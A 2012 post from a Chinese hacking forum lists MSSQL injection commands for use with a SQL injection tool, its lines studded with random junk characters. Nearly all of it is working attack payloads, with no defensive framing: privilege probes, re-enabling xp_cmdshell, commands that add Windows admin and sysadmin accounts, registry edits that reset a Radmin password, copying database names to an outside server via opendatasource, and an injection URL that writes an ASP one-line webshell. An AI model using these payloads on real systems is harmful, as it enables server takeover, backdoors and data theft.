找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1861|回复: 0
打印 上一主题 下一主题

阿D常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:26:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
阿D常用的一些注入命令* U% p& F3 ~. ~3 L! ]2 D  e
//看看是什么权限的2 i6 n0 `/ f5 P6 `0 F7 N" ?1 x$ \* g
and 1=(Select IS_MEMBER('db_owner'))! d9 R% M8 p) W( v% U' W
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--' ~1 E9 D+ b  W

6 t7 L  _" m% h" a( u# W* c//检测是否有读取某数据库的权限
0 m* V. E. i- T( p' P, ~and 1= (Select HAS_DBACCESS('master'))$ S8 q: a8 q% U1 T3 E1 g% v- \0 D
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --2 C, N2 _/ P' V! k  N! F

% d: G' _$ E, _$ _2 c: f9 r/ a, D- p! {0 }  {/ m9 |
数字类型! }5 p0 O3 y2 I- p
and char(124)%2Buser%2Bchar(124)=0$ `0 X' Y+ C$ i) ^
: J1 L% L8 W/ y. L+ P9 [
字符类型
: M& V& Y- k  q8 A2 C( q4 C' and char(124)%2Buser%2Bchar(124)=0 and ''='" O9 J. X3 E3 w$ X/ F+ t

6 q6 g/ ~2 @; a- G) {+ k搜索类型; t+ P' g# E: S
' and char(124)%2Buser%2Bchar(124)=0 and '%'='3 H  \6 i- h( z4 l& p& r1 }

1 C$ }  `  f+ F4 @. Y  Z- o爆用户名- ]# F/ V$ |+ u; L6 Z
and user>0
$ F( _9 U, H  Y' and user>0 and ''='% W7 s4 i8 b( E) f# {* M: V

% ~# [! J  V8 }. D3 a检测是否为SA权限7 f  R$ R1 o2 {0 O( ~
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
. h4 y# I6 N, I, [* ~6 ?9 OAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --+ k3 _) {3 U/ o+ p
3 X- [# G1 b0 o  V. g- Y# b
检测是不是MSSQL数据库
. L" }3 i3 x% L: B' v9 Wand exists (select * from sysobjects);-- , ]9 h9 f9 D* S" q! x* j
1 i- ?, _7 ~3 W$ s" x
检测是否支持多行2 W6 ?. |! I& H% ?  w
;declare @d int;--
' F6 s9 c  q! s5 w* W
: c7 ?& C4 p# l7 l恢复 xp_cmdshell' L) D, V* k8 p( z  u' V  v% P( u" h
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--+ a% \$ w) W3 d# I5 T! j% I1 a
) e6 S0 V3 a* M0 R1 d
3 w. _( i3 l. S! E" @/ A
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version') ' H- a7 J) T  D# c* `, W+ M
$ o$ z: v! t- t( p  \: v
//-----------------------
5 `2 T; O/ @# G+ c8 |  p# r//      执行命令
" P6 O1 s. D' z0 o9 I, H//-----------------------: ~. c0 s7 T! B& k& L7 a
首先开启沙盘模式:  P% v+ t" r, D  W0 R) F
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1  ^" H0 e; Z! R$ r% Z; J! ~
- H, K5 ?* h+ ], z% s! s
然后利用jet.oledb执行系统命令
  e; \: S0 ~5 \select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
& K! R9 Q$ a, |% y# J
; Z1 ]/ `5 [6 B% J0 g6 R- V  O" ^执行命令
  q. T! |) F$ _- B" M, O;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
0 s2 g/ K0 ]* K/ W" z* C. ~
! t: f. M4 b" u1 ^6 W2 b4 p0 bEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'/ p. T- M3 S: o
. V0 S& ?9 U9 Y  ]
判断xp_cmdshell扩展存储过程是否存在:/ V- R8 S) v5 _& c0 x
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')" ?0 E# }0 r4 j/ x  M) c
5 {$ s( Z* A' u* S6 V6 b
写注册表
- w# Q& Q- I1 B( }1 s( c2 d3 nexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
# k. }! z" ^7 e1 }% h1 U
  c( x: ]8 i5 W. k  bREG_SZ
% L) G9 k, j( ~/ M5 T/ N4 J+ G; |( g4 }
# r$ @6 B% D& x读注册表
6 f! M! f5 b/ H& g: X) Sexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'& \5 J7 }, N% L: b

7 l- I, I! J! o3 J: d读取目录内容- ?. q3 p# _3 t- t* \7 A# E
exec master..xp_dirtree 'c:\winnt\system32\',1,1
# M" \+ i# R" j4 A1 U7 H
2 ?& z9 e: v4 q) O4 |
# V" r" E0 D6 f* g9 @1 q- G数据库备份) R" S* @! r! d- B% C
backup database pubs to disk = 'c:\123.bak'
# T3 q2 p: q1 j; u4 ~% u0 y9 `% t: E9 C; w) Z- x9 ?: }/ a
//爆出长度
( B- @7 L7 Z# u/ p* u5 Z" A3 S) pAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--' u' c! G2 j0 O# a. x! Q+ @% J

  j/ O) [- c; \7 o8 @* m/ I+ H9 z2 c. _
3 Y% e% e+ v: U6 \# f4 y; @
更改sa口令方法:用sql综合利用工具连接后,执行命令:
: c* f1 E) P, {& M; bexec sp_password NULL,'新密码','sa'% B5 C* n5 z* C% H& ~- A
+ M/ F8 m9 S; \: r- E8 V
添加和删除一个SA权限的用户test:
% a3 q0 H. g, |( k6 Yexec master.dbo.sp_addlogin test,ptlove
  P, i. r4 ^+ r! wexec master.dbo.sp_addsrvrolemember test,sysadmin
( j3 A5 p4 O: c) h4 T
9 p$ c5 w' P% M) m删除扩展存储过过程xp_cmdshell的语句:
/ S, Z7 S, n) n: Y' P2 Q& Hexec sp_dropextendedproc 'xp_cmdshell'& s* V1 L( M/ p/ |4 V4 P5 i1 [( [9 S

& m- L" D- m  G+ Z) t9 U7 c/ f添加扩展存储过过程3 f8 I, K  w* c* C
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll' : K4 {% `. ?5 r' C5 D0 a4 m2 J
GRANT exec On xp_proxiedadata TO public - H: s6 O7 E' N+ I' W5 C; n3 E
4 Z* N3 N+ A5 Z
6 ^; u$ Q5 {. |
停掉或激活某个服务。 6 Y5 K: h0 C% Y% B3 U) w: `* @
, R8 F  ]" z& ^; |) G5 T
exec master..xp_servicecontrol 'stop','schedule'$ z7 h* m+ ?7 p6 o9 k* ]
exec master..xp_servicecontrol 'start','schedule'
: N1 L, C2 S  O$ h! f
  Y  T! n+ P" t/ R" N1 |dbo.xp_subdirs
9 y2 }: y$ P% W! T
3 b% x0 J) }8 K! U只列某个目录下的子目录。7 N5 d! l( y) M* _1 E' c
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'1 T8 v  m+ H" `* a9 M- S3 ^' ?
. W- L8 d$ G. [( M7 b0 d
dbo.xp_makecab
2 r- X' S+ w6 T) l0 W' h3 O
% i1 n& _$ N- c将目标多个档案压缩到某个目标档案之内。2 ^8 m' }- D, [! n7 w& d* f  X
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
6 H) [7 v: C9 u0 `% _- w8 u! |0 C- o6 W" H: x8 r
dbo.xp_makecab8 B7 D0 m* n6 e) O6 _: M  _
'c:\test.cab','mszip',1,
. d! U9 f1 b6 J+ }, {'C:\Inetpub\wwwroot\SQLInject\login.asp',$ W+ H0 e8 ]: I3 O1 p. f
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'5 i- {$ d) H, p1 ~' W
% |+ m- P- X8 r
xp_terminate_process2 a% ]: e, x: @0 K7 k

% h7 w( T3 E4 w" y* b  u) H停掉某个执行中的程序,但赋予的参数是 Process ID。( {6 V, Y, t+ j- z3 _
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
1 C# w- |0 z" m' Y  p# d2 w6 e: V5 R8 D- A& V: S
xp_terminate_process 2484
6 n( t" u+ w& p' O- V
  r) R" P& q6 Uxp_unpackcab
* X- L; F4 s: C$ `5 J1 ?7 b( l% ~3 b. A0 }* J' r8 ]
解开压缩档。+ G- q- J6 ~) s8 u' C
! X3 L% R% o! c: `4 L. w
xp_unpackcab 'c:\test.cab','c:\temp',13 }4 v" d" q. @+ U6 M  h8 B) s

7 z& l- ]  r0 z# {" N" B1 m# x" w( y; \# t' l
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
0 `* l2 n" ^& }9 Y
7 h  X+ P1 E6 w# K/ Bcreate database lcx;
7 t$ Z% [( T3 `* m  ]- pCreate TABLE ku(name nvarchar(256) null);
% Z; f( Y3 L4 l, Z! jCreate TABLE biao(id int NULL,name nvarchar(256) null);. T  {! i& @& X  H8 N, ~& b
" ^- Z0 G! w8 O* Q
//得到数据库名
; Q7 p1 C# E; w8 u* Z3 o% a0 Jinsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases/ m$ ?, T7 f9 b3 s# X0 @- b
# a, k2 `" W) F7 B% D
2 e) e; d) D, _9 a* ?# w: `4 n
//在Master中创建表,看看权限怎样7 S: ]& ^0 _1 e
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
9 n) m2 p, s, G7 p% V% }) ?% S2 r* b& E
用 sp_makewebtask直接在web目录里写入一句话马:# t5 G. @/ t$ b6 c! W1 o9 s
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--* a' {( \3 u1 I7 [  |

1 v8 M- f/ \+ I//更新表内容
6 q* D! l6 z3 P- l$ t8 YUpdate films SET kind = 'Dramatic' Where id = 123
" L+ y6 d1 Y0 }9 x( E0 A8 e/ R- L
//删除内容
7 n! l; ^: {6 u! w) vdelete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表